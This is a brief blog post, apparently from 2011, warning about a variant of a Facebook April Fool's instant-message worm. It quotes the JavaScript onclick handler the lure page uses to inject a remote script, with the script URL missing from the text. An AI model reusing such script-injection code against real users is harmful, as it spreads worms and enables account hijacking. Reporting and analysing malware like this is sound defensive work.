Monthly Archives: April 2011

new variant of Facebook April Fool’s IM worm

There’s a new variant of the Facebook April Fool’s worm going around. This one appears as an IM with the text “haha! hilarous”; the page behind the URL shortener is (taken down since I started writing this, see screenshot) which appears to be a Facebook video but actually loads some JavaScript using an onclick handler:

javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement(‘script’)).src=’! hilarous’; window.close(); }else{ document.body.appendChild(document.createElement(‘script’)).src=’! hilarous’; }

Facebook Bully Down wormWhatever it loads seems to Facebook Like the link and then IM your friends. I got three messages in a short span of time. Not sure what’s required to send IMs through Facebook, might be it uses a fake login page to steal credentials like other variants.


Tagged ,